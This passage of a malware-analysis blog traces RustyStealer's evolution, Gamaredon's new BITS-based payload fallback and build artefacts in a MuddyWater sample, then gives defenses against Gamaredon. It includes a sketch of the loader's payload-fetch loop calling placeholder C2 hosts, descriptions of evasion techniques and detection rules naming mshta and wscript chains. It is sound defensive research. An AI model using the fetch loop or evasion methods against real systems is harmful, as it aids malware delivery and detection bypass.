Explicit memory cleanup for shell APIs using CoTaskMemFree.
Removal of host fingerprinting:
GetComputerNameExW
GetUserNameW
NetGetJoinInformation
This version appears to have attempted:
Faster and more scalable file harvesting.
Cleaner filesystem abstraction.
Reduced behavioral noise by temporarily disabling host profiling.
However, asynchronous I/O pipelines significantly increase complexity and often cause instability in real-world environments. To me, this version looks more like a technical experiment than a long-term production design.
Additional findings from later code diffs
Looking at later builds and comparing them back to this branch reveals several important follow-up changes that appear to originate from the 1.1 refactor.
String handling and Defender artefacts
Older builds still expose cleartext strings such as direct Windows Defender directory paths, making static detection trivial. In later builds these strings disappear entirely and are reconstructed at runtime using multiple XOR-based decoding routines and different key constants.
I believe the outcome of the 1.1 refactor was the realization that static strings were becoming a liability, leading to systematic runtime string decryption in subsequent versions.
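Conceptually the pattern is the familiar keyed XOR reconstruction. A trivial illustration (the blob and key below are made up for demonstration, not constants taken from the samples):
def decode(blob, key):
    # the string only exists in cleartext while this runs
    return bytes(b ^ key for b in blob).decode("utf-8", errors="replace")

# hypothetical encoded blob: the Defender path XORed with a per-string key constant
encoded = bytes(b ^ 0x5A for b in b"C:\\ProgramData\\Microsoft\\Windows Defender")
print(decode(encoded, 0x5A))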
Collection handling and stability
Later builds include additional safety checks when aggregating dynamic collections (explicit overflow protection when joining result sets). The same logic exists in earlier builds but is less defensive and less structured.
This points to stability issues encountered when processing larger data sets, which may have been discovered during or shortly after the scalability experiments introduced in version 1.1.
Modular architecture continuity
Both older and newer builds continue to reference internal Rust modules such as:
src\modules\persist.rs
src\modules\interface.rs
src\modules\information.rs
src\modules\detect_av.rs
It confirms that the internal refactor in 1.1 successfully established a modular layout that later versions could iterate on without further structural changes.
Toolchain and build artefacts
Later samples expose more Rust toolchain artefacts (stable-x86_64 paths and related metadata) and show noticeable hash divergence despite similar functionality. This looks like a change in compiler version or build environment after this refactor phase, which may also explain subtle behavioral and binary layout differences between closely related samples.
My take
Version 1.1 looks like the point where the developers started stress testing their own architecture.
They might have pushed performance and concurrency, simplified some noisy host profiling and cleaned up API usage. The follow-up changes visible in later diffs show that this experiment exposed two main pain points:
Static strings and predictable artefacts were too easy to signature.
Increased scale and concurrency exposed stability issues in collection handling.
Instead of doubling down on complex async I/O, later versions appear to focus more on obfuscation, robustness and operational reliability, while keeping the modular structure introduced here.
imo 1.1 feels less like a production release and more like a learning phase that shaped the technical direction of everything that followed.
Version 2.0: Architectural consolidation and stealth optimization
Version 2.0 represents a clear shift in development priorities.
Instead of further expanding the async pipeline, the developer reverted many of the experimental components and focused on stealth, operational control and internal maturity.
Major changes observed:
Removal of asynchronous file pipeline
All overlapped I/O and event-based sync primitives present in v1.1 have been fully removed in v2.0 and later builds. No replacement async scheduling mechanisms (IOCP, APCs, worker pools or deferred execution patterns) are observable in the call graph.
The runtime execution flow is now strictly sequential, with simplified synchronization primitives replacing the earlier concurrency model. It looks like the experimental async pipeline was abandoned in favor of a more predictable and operationally stable execution model: this reduces architectural complexity, lowers race condition risk and improves long-term stability across victim environments.
Reintroduction of host fingerprinting
Host identification APIs returned:
GetComputerNameExW
GetUserNameW
NetGetJoinInformation
Focus on victim profiling, campaign correlation and backend attribution logic.
The temporary removal in v1.1 now appears to have been an experimental privacy / noise reduction phase rather than a permanent design direction.
Migration towards native NT APIs
Several subsystems were migrated towards native system calls:
Named pipes moved from CreateNamedPipeW to NtCreateNamedPipeFile
File handling introduced NtOpenFile
This reduces visibility to user-mode API hooking and increases resistance against common EDR userland instrumentation.
Introduction of cryptographic randomness and entropy hardening
Version 2.0 introduces a dedicated entropy generation pipeline based on SystemFunction036 (RtlGenRandom), replacing the previously implicit and largely deterministic behavior.
Rather than simply requesting random bytes, the implementation builds a full entropy pool that combines cryptographically secure randomness with adaptive jitter-based sampling and internal quality validation. The generated entropy is statistically evaluated at runtime and rejected if it fails basic stability and distribution thresholds. Only entropy that passes these health checks is propagated further into the execution flow.
The call chain shows that the generated randomness directly feeds into subsequent runtime decoding routines, where multiple obfuscated data blocks are reconstructed through XOR-based transformations and dynamic keys. In earlier versions, these decode paths relied almost entirely on static constants and predictable transformations. In v2.0, parts of this process become entropy-dependent and therefore non-deterministic across executions.
From an operational perspective this has several implications:
Runtime decoding behavior becomes less reproducible for static analysis and sandbox instrumentation.
Signature-based detection and clustering become more fragile, as internal state and derived values differ per execution.
Correlation across samples using hash similarity, instruction-level signatures or deterministic unpacking pipelines becomes significantly harder.
The malware gains a higher degree of resilience against emulation environments with weak or manipulated entropy sources.
While the mechanism could theoretically support use cases such as object naming, session identifiers or cryptographic material, the integration into the decode pipeline indicates that the primary motivation is obfuscation hardening and stealth rather than feature expansion.
This marks a shift in development priorities: the developers invest in making existing functionality harder to observe, reproduce and classify.
Memory protection manipulation (VirtualProtect)
VirtualProtect appears in v2.0, but not as a generic “unpacking” indicator.
It is used to flip a read-only dispatch table to writable just long enough to store dynamically resolved API pointers, then lock it back down. That's consistent with the shift towards runtime API resolving and NT-level calls: fewer static imports, less signature surface and a resolver layer that is harder to tamper with or trivially hook.
Internal synchronization refactor
Thread state handling was refactored away from TLS primitives and migrated towards modern synchronization APIs (InitializeCriticalSectionEx)
I think it’s for architectural cleanup and improved concurrency control.
Obfuscation hardening and decoder abstraction
Compared to version 1.1, version 2.0 further abstracts string decryption and reconstruction logic. Previously visible XOR decoders with fixed constants and static data offsets were refactored into more generic reconstruction helpers and indirect decode routines.
This significantly reduces static signature stability and increases the effort required for automated clustering and YARA-style detection.
Improved memory lifecycle management and cleanup paths
Version 2.0 introduces more explicit cleanup sequences, callback-based destructors and tighter buffer lifecycle handling.
Multiple teardown paths now explicitly free dynamically allocated buffers, invoke destructor callbacks and normalize internal state after large collection operations. It might be an effort to reduce memory leaks, crash probability and long-running instability during high-volume data processing.
Build pipeline evolution
Build artifacts show a different Rust toolchain and build environment compared to version 1.1. Toolchain paths shifted from shared “Archer” layouts towards user-local rustup environments, explaining observed TLSH divergence despite largely stable runtime behavior.
This reflects internal "build pipeline" changes rather than functional malware changes.
Summary
Version 2.0 prioritizes:
Simplification and rollback of risky experimental I/O designs
Stronger stealth via native API usage and obfuscation hardening
Improved runtime stability and memory hygiene
Reintroduction of host profiling for operational correlation
Internal architectural consolidation rather than feature expansion
Overall, this release reflects a stabilization phase where operational reliability and detection resistance outweigh rapid feature development.
Conclusion
If there’s one takeaway from this exercise, it’s that even relatively “boring” commodity implants become surprisingly interesting once you stop treating them as static blobs and start treating them like evolving software projects.
By correlating build artefacts, dependency drift, fuzzy hashes and targeted code diffs, we can reconstruct a fairly coherent development timeline for RustyStealer without having to reverse every single function into oblivion. We see experimentation phases (hello async pipeline), rollbacks when ideas don’t survive real-world friction, hardening towards stealth (dynamic API resolution, entropy injection) and the usual toolchain churn that comes with real developers shipping real code, even if that code happens to be malware.
None of this magically turns RustyStealer into some next-gen cyber superweapon. It’s still fundamentally a fairly standard implant doing fairly standard implant things. It’s also a nice reminder that “grep strings > extract a few IOCs > call it a day” only gets you so far. If you actually want to understand how an actor operates, what they experiment with and where their engineering effort goes, you have to look at trends, not snapshots. Which admittedly takes more time, more coffee and slightly more patience than copy-pasting hashes into VirusTotal, buuuut the payoff is a much clearer picture of what’s really going on under the hood.
There’s also a more general lesson in all of this imo
If the goal is to actually understand a threat actor, not just label a sample and move on, then obsessing over individual functions, opcodes and micro-optimizations only gets you part of the way. That level of detail is useful, but it doesn’t tell you how the tooling evolves, where engineering effort is invested, which ideas get abandoned or how operational priorities shift over time. These signals live in the truly boring parts: build artefacts, dependency drift, architectural refactors, version churn and the occasional accidental breadcrumb left behind in a binary or wherever. When you line those up over multiple samples, you start seeing intent and process instead of isolated behaviour, and this is exactly what we want ^-^
In this article, I distinguish between GamaLoad and Pterodo. I still consider GamaLoad a transitional stage, primarily implemented as a defensive layer to slow down analysis rather than as a fundamentally new capability. That said, there are visible changes both in payload delivery and in obfuscation.
I’ll mainly focus on what has changed since my last posts. If you’re interested in the broader context and historical behavior, have a look at the previous articles first.
For this analysis, I pulled the latest Gamaredon sample with the hash:
and dropped it straight into my tracking framework.
From a delivery perspective, not much has changed compared to Gamaredon's last shift. The victim still receives a RAR archive as an attachment. When opened or extracted, it drops an HTA file into the Startup folder, infecting the system on the next reboot. A few minutes later, my tracking system already picked up the first fresh GamaLoad samples for analysis.
When comparing these new samples to the December 2025 batch, one thing immediately stood out: they are almost twice as large and noticeably more obfuscated.
(Left column: line count, right column: hash+date)
The obfuscation hasn’t just increased (which, honestly, doesn’t help much given how terrible Gamaredon's obfuscation usually is :D), but it has also become slightly smarter.
Historically, their scripts contained tons of junk loops that served absolutely no purpose and could simply be deleted during manual deobfuscation. In the newer samples, however, more variables defined inside those junk blocks are later reused in the actual execution flow.
So if you’re still deobfuscating by hand or your automation isn’t fully mature yet, you’ll want to be a bit more careful here.
(Variable larkxGg is defined in the junk loop, but used after it)
The Interesting Part
A few days ago, I published an article showing how surprisingly easy it is to defend against Gamaredon by blocking a small set of Windows tools such as mshta.exe or MSXML2.XMLHTTP. If you’re honest about it, Gamaredon’s tooling is… let’s say “not exactly impressive”. Blocking a handful of abused LOLBins already makes payload delivery painfully difficult for them. Their development is slow, incremental, and often fairly predictable.
Well, I guess they noticed.
The defensive measures described in that article have now been bypassed. Don’t worry though, we’ll adjust accordingly 😁
Fallback on Fallback: Now Featuring BITS
The new GamaLoad script still relies on a familiar fallback structure to retrieve and execute payloads from their delivery infrastructure.
Conceptually, this is very simple: the script keeps trying different URLs until one successfully returns a payload. If everything fails, an empty string is returned.
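In concept, the loop looks roughly like this (Python purely for readability; the real logic lives in obfuscated VBScript inside the HTA, and the URLs are placeholders):
import requests

def fetch_payload(urls):
    for url in urls:
        try:
            r = requests.get(url, timeout=15)
            if r.ok and r.text.strip():
                return r.text            # first URL that returns something wins
        except requests.RequestException:
            continue                     # unreachable or blocked -> try the next one
    return ""                            # everything failed -> empty string

payload = fetch_payload(["http://first-c2.example/stage", "http://second-c2.example/stage"])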
What’s new is that this fallback logic now has… another fallback.
If no payload stage can be retrieved via the usual mechanisms, the script switches to downloading the payload using bitsadmin.
What is bitsadmin?
bitsadmin is a Windows utility used to control the Background Intelligent Transfer Service (BITS), which provides reliable background downloads and uploads. Attackers abuse it as a Living-off-the-Land Binary (LOLBin) to quietly retrieve payloads without dropping additional tooling onto disk.
From an attacker’s perspective, BITS has some very attractive properties:
resilient background transfers
native proxy support
high reliability on unstable networks
no obvious “malware-looking” process tree
exactly the kind of boring enterprise plumbing malware loves to hide in ^^
Why Gamaredon Switched to BITS
For years, Gamaredon heavily relied on classic LOLBins such as mshta.exe and MSXML2.XMLHTTP for payload delivery and execution. By now, these techniques are:
blocked by default in many environments (AppLocker, ASR rules, EDR hardening)
BITS, in contrast, is much harder for defenders to take away:
it is actively used by Windows itself (Windows Update, Defender, Office, etc.)
blocking it outright often creates operational risk in enterprise environments
its network traffic looks boring and legitimate (svchost.exe, Microsoft-like headers)
it works reliably behind proxies and restrictive networks
If your previous delivery pipeline keeps getting kicked in the teeth by defenders, BITS is a logical next step even for an actor whose tooling evolution is usually measured in geological time.
EDIT 2026-01-18: I published a follow-up article analyzing the evolution and version history of the latest RustyStealer samples, focusing on change tracking, tooling evolution, and architectural shifts across multiple builds
Today I was bored, so I decided to take a short break from Russian threat actors and spend a day with our friends from Iran instead. I grabbed a sample attributed to MuddyWater (hash: "f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f", sample from here) and originally planned to do a fairly standard malware analysis.
That plan lasted about five minutes.
What started as a normal sample quickly turned into something much more interesting for me: the developer didn’t properly strip the binary and left behind a lot of build artefacts, enough to sketch a pretty solid profile of the development toolchain behind this malware.
In this post I won’t go into a full behavioral or functional analysis of the payload itself. Instead, I’ll focus on what we can learn purely from the developer's mistakes, what kind of profile we can derive from them and how this information can be useful for clustering and campaign tracking. A more traditional malware analysis of this sample will follow in a future post.
Quick Context: Who Is MuddyWater Anyway?
Before going any further, a quick bit of context on MuddyWater, because this part actually matters for what follows.
MuddyWater is a long-running Iranian threat actor commonly associated with the Iranian Ministry of Intelligence and Security (MOIS). The group is primarily known for espionage-driven operations targeting government institutions, critical infrastructure, telecommunications and various organizations across the Middle East and parts of Europe.
This is not some random crimeware operator copy-pasting loaders from GitHub like script kiddies. We’re talking about a mature, state-aligned actor with a long operational history and a fairly diverse malware toolkit.
Which is exactly why the amount of build and development artefacts left in this sample is so interesting.
The initial sample is a .doc file. Honestly, nothing fancy just a Word document with a macro that reconstructs an EXE from hex, writes it to disk and executes it. Classic stuff.
While the payload shows a clear shift towards modern Rust-based tooling, the document dropper still relies on “obfuscation” techniques that wouldn’t look out of place in early 2000s VBA malware. Turning strings into ASCII integers and adding unreachable trigonometric conditions mostly just makes human analysts roll their eyes. It provides essentially zero resistance against automated analysis, but hey, let’s move on.
Extracting the Payload
To extract the binary cleanly, I wrote a small Python script:
#!/usr/bin/env python3
# Author: Robin Dos
# Created: 10.01.2025
# This script extracts the embedded binary from a MuddyWater VBA macro
import re
import sys
from pathlib import Path
import olefile
DOC = Path(sys.argv[1])
OUT = Path(sys.argv[2]) if len(sys.argv) > 2 else Path("payload.bin")
STREAM = "Macros/UserForm1/o"
def main():
if not DOC.exists():
raise SystemExit(f"File not found: {DOC}")
ole = olefile.OleFileIO(str(DOC))
try:
if not ole.exists(STREAM.split("/")):
# list streams for troubleshooting
print("stream not found. Available streams:")
for s in ole.listdir(streams=True, storages=False):
print(" " + "/".join(s))
raise SystemExit(1)
data = ole.openstream(STREAM.split("/")).read()
finally:
ole.close()
# Extract long hex runs
hex_candidates = re.findall(rb"(?:[0-9A-Fa-f]{2}){200,}", data)
if not hex_candidates:
raise SystemExit("[!] No large hex blob found in the form stream.")
hex_blob = max(hex_candidates, key=len)
# clean (jic) and convert
hex_blob = re.sub(rb"[^0-9A-Fa-f]", b"", hex_blob)
payload = bytes.fromhex(hex_blob.decode("ascii"))
OUT.write_bytes(payload)
print(f"wrote {len(payload)} bytes to: {OUT}")
print(f"first 2 bytes: {payload[:2]!r} (expect b'MZ' for PE)")
if __name__ == "__main__":
main()
In the end I get a proper PE32+ executable, which we can now analyze further.
If we check the hash on VirusTotal, we can see that the file is already known, but only very recently:
We also get multiple attributions pointing toward MuddyWater:
So far, nothing controversial: this is a MuddyWater RustyStealer sample, as we’ve seen before.
Build Artefacts: Where Things Get Interesting
Now that we have the final payload, I loaded it into Ghidra. First thing I always check: strings.
And immediately something interesting pops up:
The binary was clearly not properly stripped and contains a large amount of leftover build artefacts. Most notably, we can see the username “Jacob” in multiple build paths.
No, this does not automatically mean the developer’s real name is Jacob. But it does mean that the build environment uses an account named Jacob, and that alone is already useful for clustering.
I went through all remaining artefacts and summarized the most interesting findings and what they tell us about the developer and their environment.
This is actually quite useful information, because many malware authors either:
build on Linux and cross-compile for Windows, or
use the GNU toolchain on Windows.
Here, by contrast, we are looking at a real Windows dev host with Visual C++ build tools installed.
Username in Build Paths
C:\Users\Jacob\
Again, not proof of identity, but a very strong clustering indicator. If this path shows up again in other samples, you can (confidently) link them to the same build environment or toolchain.
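To make use of that, you don’t need anything fancy. Below is a minimal retro-hunting sketch (mine, not part of the original tooling): it simply greps a folder of samples for known build-environment artefacts. The artefact list is a placeholder seeded with the strings discussed here; extend it with your own findings.
#!/usr/bin/env python3
# Hypothetical clustering helper: flag samples containing known build-environment
# artefacts (user build paths, toolchain strings) instead of volatile IOCs.
import sys
from pathlib import Path

# Artefact strings observed in this sample; placeholders, extend as needed.
ARTEFACTS = [b"C:\\Users\\Jacob\\", b"rustc-demangle"]

def scan(sample_dir: str) -> None:
    for f in Path(sample_dir).rglob("*"):
        if not f.is_file():
            continue
        data = f.read_bytes()
        hits = [a.decode(errors="replace") for a in ARTEFACTS if a in data]
        if hits:
            print(f"{f}: {', '.join(hits)}")

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else ".")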
Build Quality & OPSEC Trade-Offs
The binary contains:
panic strings
assertion messages
full source paths
Examples:
assertion failed: ...
internal error inside hyper...
Which suggests:
no panic = abort
no aggressive stripping
no serious release hardening focused on OPSEC
development speed and convenience clearly won over build sanitization
Which is honestly pretty typical for APT tooling, but this is still very sloppy ngl
Dependency Stack & Framework Fingerprint
Crates and versions found in the binary:
atomic-waker-1.1.2
base64-0.22.1
bytes-1.10.1
cipher-0.4.4
ctr-0.9.2
futures-channel-0.3.31
futures-core-0.3.31
futures-util-0.3.31
generic-array-0.14.7
h2-0.4.12
hashbrown-0.15.5
http-1.3.1
httparse-1.10.1
http-body-util-0.1.3
hyper-1.7.0
hyper-tls-0.6.0
hyper-util-0.1.16
icu_normalizer-2.0.0
idna-1.1.0
indexmap-2.11.0
ipnet-2.11.0
iri-string-0.7.8
mio-1.0.4
percent-encoding-2.3.2
rand-0.6.5
reqwest-0.12.23
smallvec-1.15.1
socket2-0.6.0
tokio-1.47.1
tower-0.5.2
universal-hash-0.5.1
url-2.5.7
utf8_iter-1.0.4
want-0.3.1
windows-registry-0.5.3
What we can extract from this:
Network Stack
Async HTTP client (reqwest)
Full hyper stack (hyper, hyper-util, http, httparse)
HTTP/1.1 and HTTP/2 support (h2)
TLS via Windows Schannel (hyper-tls)
Low-level socket handling (socket2, mio)
So this is very clearly not basic WinInet abuse or some minimal downloader logic. It’s a full-featured HTTP client stack assembled from modern Rust networking libraries, with proper async handling.
Looks much more like a persistent implant than a simple one-shot loader.
Async Runtime
tokio
futures-*
atomic-waker
This strongly suggests an event-driven design with concurrent tasks, typical for beaconing, task polling and long-running background activity.
Not what you would expect from a disposable stage loader.
Crypto
cipher
ctr
universal-hash
generic-array
plus base64
Active use of AEAD-style primitives, very likely AES-GCM or something close to it.
Which looks to me like:
encrypted embedded configuration
and/or encrypted C2 communication
Either way, encryption is clearly part of the design
rustc-demangle
One telling artefact is the presence of source paths from the rustc-demangle crate, including references to .llvm./rust/deps/.../src/lib.rs
These are build-time paths leaking straight out of the developer’s Cargo environment. In my opinion this means that panic handling and backtrace support were left enabled, instead of using an aggressive panic=abort and stripping strategy.
This was almost certainly built locally on the developer’s Windows workstation or VM. Just someone hitting cargo build on their dev box. Relatable, honestly.
Compiler Version (Indirectly)
Multiple references to:
/rustc/ded5c06cf21d2b93bffd5d884aa6e96934ee4234/
This is the Rust compiler commit hash.
That allows fairly accurate mapping to a Rust release version (very likely around Rust 1.92.0)
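If you want to pull that hash out of a binary yourself, a quick sketch like the following is enough; the commit can then be looked up manually against the rust-lang/rust repository to pin down the compiler release (this is my helper, not something from the sample):
#!/usr/bin/env python3
# Sketch: extract embedded rustc commit hashes (/rustc/<40-hex>/ paths) from a binary.
import re
import sys
from pathlib import Path

data = Path(sys.argv[1]).read_bytes()
for commit in sorted(set(re.findall(rb"/rustc/([0-9a-f]{40})/", data))):
    print(commit.decode())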
This is not just a single-purpose loader. This is a modular implant, much closer to a full backdoor framework than a simple dropper.
What This Tells Us About the Developer & Operation
Technical Profile
Rust developer
works on Windows
uses MSVC toolchain
builds locally, not via CI
comfortable with async networking
understands TLS and proxy handling
Operational Assumptions
expects EDR solutions (found a lot of AV-related strings, but nothing too relevant tbh)
expects proxy environments
targets corporate networks
uses modular architecture for flexibility
OPSEC Choices
prioritizes development speed
does not heavily sanitize builds
accepts leakage of build artefacts (LOL)
Which again fits very well with how many state-aligned toolchains are developed: fast iteration, internal use and limited concern about reverse-engineering friction.
From a threat hunting perspective, these artefacts are far more useful than yet another short-lived C2 domain: they allow us to track the toolchain, not just the infrastructure.
What Build Artifacts Reveal About Actor Development
Build artifacts embedded in operational malware are more than just accidental leaks; they offer a look into an actor’s internal development maturity. Exposed compiler paths, usernames, project directories or debug strings strongly suggest the absence of a hardened release pipeline. In mature development environments, build systems are typically isolated, stripped of identifiable metadata and designed to produce reproducible, sanitized artifacts. When these indicators repeatedly appear in live payloads, it points to ad-hoc or poorly automated build processes rather than a structured CI/CD workflow.
The continued presence of build artifacts across multiple campaigns is particularly telling. It indicates not just a single operational mistake, but a lack of learning or feedback integration over time. Actors that actively monitor public reporting and adapt their tooling usually remediate these issues quickly. Those that do not remediate them reveal organizational constraints, limited quality assurance or sustained time pressure within their development cycle. I’ll do some more research on MuddyWater in the next few weeks to get a better understanding of whether this was a single incident or a general problem in MuddyWater’s development process.
Leaving build artefacts in your malware is rarely about “oops, forgot to strip the binary”. It’s more a side effect of how development, testing and deployment are glued together inside the operation. From a defender’s POV, that’s actually way more useful than yet another throwaway C2 domain / IP. These artefacts don’t rotate every week; they give you fingerprints that can survive multiple campaigns.
This is the result of a lengthy analysis and study of the Gamaredon UAC-0010 group. I recommend reading my previous articles for more context.
Defending against Gamaredon is uncomfortable not because the group uses particularly advanced malware, but because it forces defenders to question many assumptions that modern security strategies are built on.
Gamaredon does not rely on sophisticated exploits, stealthy implants or long-lived infrastructure. Instead it operates through large volumes of simple scripts, constantly changing delivery mechanisms and an infrastructure that is designed to burn fast and disappear. Indicators of compromise age out quickly, payloads are interchangeable and even the tooling itself adapts once it becomes the subject of analysis.
Over the past months, tracking Gamaredon has felt less like reverse engineering a malware family and more like observing a process in motion. Loader scripts evolve, obfuscation shifts slightly from wave to wave and infrastructure changes just enough to break automated collection pipelines. At times, analysis environments are actively identified and fed with destructive or misleading payloads, which turns the act of investigation itself into a signal the actor seems to react to.
This makes Gamaredon a poor fit for traditional, indicator-driven defense models. Blocking hashes, domains or IP addresses provides short-lived relief at best. By the time a rule is deployed, the campaign may already have moved on. What remains stable is not the malware, but the behavior: how access is gained, how scripts are executed, how network communication deviates from normal client behavior and how the actor responds when it detects scrutiny.
This article focuses on defensive measures that have proven effective while actively observing Gamaredon operations in the wild. The goal is not to “out-APT” the attacker, but to break the operational assumptions that Gamaredon relies on: permissive script execution, weak visibility into client behavior and an overreliance on static threat intelligence.
Defending against Gamaredon is less about stopping a specific toolset and more about disrupting a workflow. Once that distinction is understood, the problem becomes significantly more manageable 🙂
What End Users Can Do to Reduce Risk
Remember: Gamaredon does not break into systems. It is invited in
1. Attachments are the attack surface
Gamaredon infects systems through spear phishing. End users who have received appropriate training therefore significantly reduce the risk of infection. Modern phishing campaigns, particularly those operated by actors like Gamaredon, do not rely on obvious deception or complex exploits; they exploit trust in routine actions. An email attachment that appears harmless can be nothing more than a delivery mechanism for script execution. Shortcuts, script files or archive formats are instructions, not documents.
For this reason, email attachments should never be opened impulsively. Files originating from unknown senders, unexpected conversations or unclear contexts must always be routed through a defined analysis workflow. This may include automated malware scanning, sandbox execution or escalation to a SOC or security team for manual review.
Treating attachments as executable content rather than documents removes a core assumption attackers rely on: that a single double-click is enough to gain a foothold.
2. “It looks normal” is not a defense
A common assumption in phishing awareness is that malicious emails will “look suspicious.” Misspelled text, strange formatting or obviously fake senders are warning signs. Campaigns operated by Gamaredon routinely break this expectation.
Many of the emails used in these operations are short, plain and unremarkable. They may not contain any obvious red flags, no unusual wording and no visual elements that stand out. In some cases, the message itself is barely relevant at all. The attachment is the real payload.
Relying on visual cues or intuition to assess whether an email is safe is therefore ineffective. A file does not need to look dangerous to be dangerous. Shortcuts, script files and archived attachments can appear entirely legitimate while silently triggering code execution in the background.
This is intentional. Gamaredon does not attempt to impress the recipient or convince them emotionally. Instead, it blends into routine communication, where opening an attachment feels like a harmless, almost automatic action.
For this reason, the absence of suspicious indicators should never be treated as confirmation of safety. Normal-looking emails are not evidence of harmless content; they are often the environment in which these campaigns are most successful.
3. Why double-clicking is dangerous
Most people treat double-clicking as a harmless, almost meaningless action. It is how you open a document, check an image, or quickly look at a file someone sent you. From a usability perspective, that makes sense. From a security perspective, it is exactly the problem.
Not every file is a document! Many files are nothing more than instructions telling Windows to execute other programs, run scripts or fetch additional content from the internet. When you double-click those, you are not “previewing” anything. You are actively starting a process chain.
What makes this especially effective is how unspectacular it looks. In many Gamaredon cases the initial file does almost nothing visible. Maybe a window flashes, sometimes nothing happens at all. From the user’s point of view, that feels like a failed or broken attachment. From the attacker’s POV the important part already happened: code execution in user context.
This is not accidental. Gamaredon does not need the first file to be powerful. It only needs it to run. The rest can be downloaded, replaced or updated later. The initial step is small, quiet and easy to overlook.
That is why “just opening it to see what it is” is not a safe strategy. With many attachment types, execution is the first and only action. There is no confirmation dialog, no warning and no visible sign that anything meaningful happened until much later, when the real payload is already in place.
tldr: double-clicking is not a neutral action. It is a trust decision, and attackers like Gamaredon build their entire delivery chain around the assumption that this trust will be given automatically. Gamaredon can be avoided if you stop trusting the files you are about to open. As Lenin said, “доверяй, но проверяй” (“trust, but verify”) 😉
4. Update. Update. Update.
Always keep the software on your system up to date. Gamaredon has actively exploited real-world vulnerabilities, for example a WinRAR vulnerability “CVE-2025-6218” observed in campaigns since late 2025.
This vulnerability allows an attacker to place a malicious file into the Windows startup folder when an archive is opened or extracted. The user may only see a normal archive being unpacked, while persistence is already being established in the background and the system becomes infected after the next reboot. This is exactly the kind of low-effort, high-impact technique that fits Gamaredon’s operational model.
Keeping your software updated, especially tools that handle downloaded files such as archive managers, removes entire classes of attack techniques.
5. When to escalate
One of the most reliable defenses attackers have is silence. Not because nothing happened, but because users assume that whatever happened is probably not important enough to bother anyone with.
“This file didn’t open properly” “The window flashed and disappeared” “Nothing seems broken so it’s probably fine”
From the perspective of an attacker, this is perfect. Initial access does not necessarily need to be loud, it only needs to be unnoticed.
The first-stage file doesn’t display an error message, ransomware screen or any obvious sign of compromise. It executes, exits and waits for the next step. If no one reports it, there is nothing to investigate, nothing to contain and nothing to learn from.
Users hesitate to report something because they do not want to be wrong, do not want to interrupt anyone or assume that security teams only care once things are clearly broken. Unfortunately, by the time something is clearly broken, the attacker has already achieved most of their objectives.
From a defensive POV, the ideal time to escalate is when you are unsure whether something has happened at all, not when you are sure something malicious happened.
If an attachment behaves strangely, if a file does not open as expected, if a website triggers a download you did not request or if anything simply feels off, that is already enough reason to report it. Security teams do not need certainty. They need signals. It’s better to report one false positive too many to your security team than not to report it at all.
Yes, most reports will turn out to be harmless. That is fine. What is not fine is missing the few cases that actually matter because no one wanted to be the person who raised a false alarm.
tldr: if something looks broken, weird or pointless, that is not a reason to ignore it. That is exactly when escalation is supposed to happen. The worst possible outcome of reporting is a short investigation. The worst possible outcome of not reporting is an attacker quietly staying in your network.
Defensive Controls for System and Network Administrators
1. Kill the script layer
Gamaredon’s operations depend almost entirely on script-based execution. VBScript, JS, HTA files and shortcut-based loaders are the foundational tools. Without the ability to execute scripts in user context, the majority of observed Gamaredon infection chains fail before any payload is delivered.
This makes the script execution layer a highly effective choke point for defenders.
In many environments, script interpreters such as wscript.exe, cscript.exe or mshta.exe are still broadly available to all users, despite having little to no legitimate business use. From an attacker’s perspective, this provides a reliable and low-friction execution environment that does not require exploits, elevated privileges or complex tooling.
Restricting or disabling these components significantly raises the cost of an attack. Blocking mshta.exe entirely, enforcing execution policies for VBScript and JScript and preventing script execution from user-writable locations such as Downloads, Temp or profile directories removes a critical assumption Gamaredon relies on: that scripts will execute by default.
Where complete blocking is not feasible, strict allow-listing needs to be applied. Script execution should be limited to known, signed, and explicitly required use cases. Everything else should fail closed.
It is important to note that this is not merely a prevention measure, but also a detection opportunity. Script-based attacks are very noisy at the process level. Parent-child relationships such as email clients spawning script hosts or shortcut files launching interpreters provide strong, behavior based signals that are far more stable than file hashes or domains.
Defenders mostly focus on detecting the final payload. Against Gamaredon, this approach is too late. By the time a second stage binary is downloaded, the attacker has already achieved their primary goal: execution. Eliminating or tightly controlling the script layer prevents this first and most critical step.
Option 1: Disable mshta.exe
mshta.exe has virtually no legitimate use in modern enterprise environments and is heavily abused by Gamaredon.
This alone stops most VBS- and JS-based Gamaredon loaders. It’s also a good defense against other threat actors, since Gamaredon is far from the only one using these methods.
Option 3: Block Script Exec from User-Writable Paths
Gamaredon relies on execution from:
Downloads
%TEMP%
%APPDATA%
Email attachment paths
Apply to:
.vbs
.js
.hta
.lnk
Prevents double-click execution even if scripts are not fully disabled
Option 4: If Blocking is impossible – Make It Visible
Some environments cannot fully disable scripts. In that case, visibility is mandatory.
Enable Script Block Logging:
Computer Configuration
> Administrative Templates
> Windows Components
> Windows PowerShell
Enable:
Turn on Script Block Logging
Turn on Module Logging
Enable Command Line Process Auditing
Computer Configuration
> Administrative Templates
> System
> Audit Process Creation
Enable:
Include command line in process creation events
This enables:
Event ID 4688
Parent/Child relationships:
outlook.exe > wscript.exe
explorer.exe > mshta.exe
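Once command-line auditing is enabled, hunting for these chains is straightforward. A very rough triage sketch over an exported process-creation log could look like this; the CSV column names are assumptions about your export format and need to be adapted to your SIEM/EDR:
#!/usr/bin/env python3
# Sketch: flag suspicious parent/child process chains in an exported 4688 / process-creation CSV.
import csv
import sys

# Pairs discussed above; extend with your own environment-specific chains.
SUSPICIOUS = {
    ("outlook.exe", "wscript.exe"),
    ("outlook.exe", "mshta.exe"),
    ("explorer.exe", "mshta.exe"),
}

with open(sys.argv[1], newline="", encoding="utf-8") as fh:
    for row in csv.DictReader(fh):
        parent = row.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
        child = row.get("Image", "").lower().rsplit("\\", 1)[-1]
        if (parent, child) in SUSPICIOUS:
            print(f"[!] {parent} -> {child} :: {row.get('CommandLine', '')}")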
Option 5: YARA on Email Attachments
One of the most effective yet underestimated defensive layers in Gamaredon-style campaigns is attachment scanning at the email gateway using YARA rules.
Since a large part of Gamaredon’s initial access relies on script-based loaders delivered directly as attachments (HTA, VBS, JS, LNK), most of the time inside archives (abusing the WinRAR CVE since late 2025), scanning files before they ever reach the user can break the infection chain at the earliest possible stage.
YARA is particularly useful here because it does not rely on file hashes or exact filenames. Structural patterns, script constructs and typical obfuscation techniques tend to remain relatively stable even when the surrounding delivery changes. That makes YARA a good fit for detecting families of loaders rather than individual samples.
